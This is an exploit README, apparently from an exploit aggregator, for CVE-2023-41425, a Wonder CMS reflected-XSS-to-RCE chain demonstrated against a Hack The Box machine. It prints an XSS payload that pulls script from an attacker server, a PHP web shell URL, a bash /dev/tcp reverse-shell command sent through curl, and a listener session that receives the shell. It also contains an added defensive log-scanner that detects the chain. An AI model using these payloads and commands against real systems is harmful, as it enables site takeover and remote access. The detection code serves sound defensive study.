## https://sploitus.com/exploit?id=65AB8A87-83D4-5506-8695-78C3B2D45141
# CVE-2023-41425

CVE-2023-41425 is a reflected XSS vulnerability in Wonder CMS that can be chained into remote code execution: a malicious script delivered through the XSS drives the `installModule` component to install an attacker-supplied module.

# Usage

Run the exploit against the target's `loginURL`, specifying our IP and port for the web server that hosts the malicious `.js` file:

```console
$ python3 exploit.py --url http://sea.htb/loginURL --xip 10.10.16.25 --xport 8888
[+] Creating PHP Web Shell
[+] Writing malicious.js
[+] XSS Payload:
http://sea.htb/index.php?page=loginURL?"></form><script+src="http://10.10.16.25:8888/malicious.js"></script><form+action="
[+] Web Shell can be accessed once .zip file has been requested:
http://sea.htb/themes/malicious/malicious.php?cmd=<COMMAND>
[+] To get a reverse shell connection run the following:
[+] curl -s 'http://sea.htb/themes/malicious/malicious.php' --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'" 
[+] Starting HTTP server
Serving HTTP on 10.10.16.25 port 8888 (http://10.10.16.25:8888/) ...
<--REDACTED-->  "GET /malicious.js HTTP/1.1" 200 -
<--REDACTED-->  "GET /malicious.zip HTTP/1.1" 200 -
<--REDACTED-->  "GET /malicious.zip HTTP/1.1" 200 -
<--REDACTED-->  "GET /malicious.zip HTTP/1.1" 200 -
<--REDACTED-->  "GET /malicious.zip HTTP/1.1" 200 -
```

Send the XSS payload to the victim. Once the victim opens the link, their browser requests the `.js` file from the web server started above. That script then downloads the malicious `.zip` module, which contains a simple PHP web shell.

Once the `.zip` has been requested, the module has been installed through `installModule` and the web shell can be reached at the link printed by the script.
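Seen from the target's side, the chain described above leaves three separate traces in the web server access log: the login page request carrying injected markup, the `installModule` request pointing at an external module URL, and the later requests to a `.php` file under `themes/` with a `cmd` parameter (the `.zip` download itself only shows up in the attacker's own HTTP server log, as the usage output above illustrates). The following detection script is added here as an example and is not part of the exploit repository; the log lines are constructed, and the `/plugins/` path plus the assumption that `installModule` arrives as a query parameter naming the module URL are mine rather than stated on the page.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Combined log format: client IP, timestamp, request line, status, response size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Markup that has no business inside the query string of a CMS page request.
# The payload on this page closes the login <form> and injects <script src=...>.
XSS_MARKUP_RE = re.compile(
    r"<\s*/?\s*(script|form|iframe|img|svg|object|embed)\b|javascript:|\bon[a-z]+\s*=",
    re.IGNORECASE,
)

# Modules land under themes/ (shown on the page) or plugins/ (assumed here).
# A direct request to a .php file there with a cmd parameter is the web shell in use.
MODULE_PHP_RE = re.compile(r"^/(themes|plugins)/[^/]+/[^/]+\.php$", re.IGNORECASE)

# Constructed sample log (not captured from any real host): a benign login page
# request, a benign page with a harmless "month" parameter, the XSS link as a
# browser would percent-encode it, the install request, one web shell command,
# and a static asset.
SAMPLE_LOG = """\
10.10.16.25 - - [10/Aug/2024:12:00:01 +0000] "GET /index.php?page=loginURL HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
10.10.16.25 - - [10/Aug/2024:12:00:02 +0000] "GET /index.php?page=home&month=8 HTTP/1.1" 200 3988 "-" "Mozilla/5.0"
10.129.0.7 - - [10/Aug/2024:12:01:10 +0000] "GET /index.php?page=loginURL?%22%3E%3C/form%3E%3Cscript+src=%22http://10.10.16.25:8888/malicious.js%22%3E%3C/script%3E%3Cform+action=%22 HTTP/1.1" 200 4301 "-" "Mozilla/5.0"
10.129.0.7 - - [10/Aug/2024:12:01:12 +0000] "GET /index.php?installModule=http://10.10.16.25:8888/malicious.zip HTTP/1.1" 302 0 "http://sea.htb/index.php?page=loginURL" "Mozilla/5.0"
10.10.16.25 - - [10/Aug/2024:12:01:30 +0000] "GET /themes/malicious/malicious.php?cmd=id HTTP/1.1" 200 58 "-" "curl/8.0.1"
10.10.16.25 - - [10/Aug/2024:12:01:31 +0000] "GET /themes/default/css/style.css HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""


def decode_twice(s: str) -> str:
    """Percent-decode twice so a single layer of double-encoding cannot hide markup."""
    return unquote_plus(unquote_plus(s))


def classify_request(target: str) -> list[str]:
    """Return finding labels for one request target (path plus query); empty if benign."""
    parts = urlsplit(target)
    path = unquote_plus(parts.path)
    query = decode_twice(parts.query)
    params = parse_qs(query, keep_blank_values=True)
    findings: list[str] = []

    # Stage 1: reflected XSS attempt, HTML/JS markup injected into a parameter.
    if XSS_MARKUP_RE.search(query):
        findings.append("xss_markup_in_query")

    # Stage 2: the injected script makes the admin's browser ask installModule to
    # fetch a module from an external URL (assumed parameter shape, see lead-in).
    for value in params.get("installModule", []):
        if re.match(r"https?://", value, re.IGNORECASE):
            findings.append("remote_module_install")
            break

    # Stage 3: commands sent to the PHP file dropped by the installed module.
    if MODULE_PHP_RE.match(path) and "cmd" in params:
        findings.append("webshell_command")

    return findings


def scan_log(text: str) -> list[dict]:
    """Parse combined-format lines and return one alert per request with findings."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not well-formed access log entries
        findings = classify_request(m["target"])
        if findings:
            alerts.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"], "findings": findings})
    return alerts


def chain_complete(alerts: list[dict]) -> bool:
    """True when all three stages of the XSS-to-RCE chain appear in the alerts."""
    seen = {f for a in alerts for f in a["findings"]}
    return {"xss_markup_in_query", "remote_module_install", "webshell_command"} <= seen


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for alert in found:
        print(alert["ts"], alert["ip"], alert["findings"], alert["target"][:80])
    print("full chain observed:", chain_complete(found))
```

Two of the three stages are visible even before any shell command is run, so alerting on `xss_markup_in_query` followed by `remote_module_install` from the same client gives an earlier signal than waiting for `webshell_command`; the `cmd` check is kept because a module may also be dropped by other means.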

## Running commands

```console
$ curl -s 'http://sea.htb/themes/malicious/malicious.php?cmd=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

## Reverse Shell

Set up the listener first, then run a command that establishes the reverse shell connection. The script prints one example for Linux targets.

```console
$ curl -s 'http://sea.htb/themes/malicious/malicious.php' --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/10.10.16.25/7777 0>&1'"
```

The listener then receives the connection:

```console
$ rlwrap -cAr nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.16.25] from (UNKNOWN) [10.129.194.205] 54398
bash: cannot set terminal process group (1135): Inappropriate ioctl for device
bash: no job control in this shell
www-data@sea:/var/www/sea/themes/malicious$
```

# Installation

Install the requirements:

```console
$ pip install -r requirements.txt
```

Help:

```console
$ python3 exploit.py --help

usage: exploit.py [-h] --url URL --xip XIP --xport XPORT

Exploit Wonder CMS v3.2.0 - v3.4.2 XSS to RCE (CVE-2023-41425)
Initial CVE and proof-of-concept by prodigiousMind
Rewritten by xpltive

options:
  -h, --help     show this help message and exit
  --url URL      Target URL of loginURL (Example: http://sea.htb/loginURL)
  --xip XIP      IP for HTTP web server that hosts the malicious .js file
  --xport XPORT  Port for HTTP web server that hosts the malicious .js file
```

# Credits

Credits to `prodigiousMind` for discovering and reporting the vulnerability ([Link](https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413)).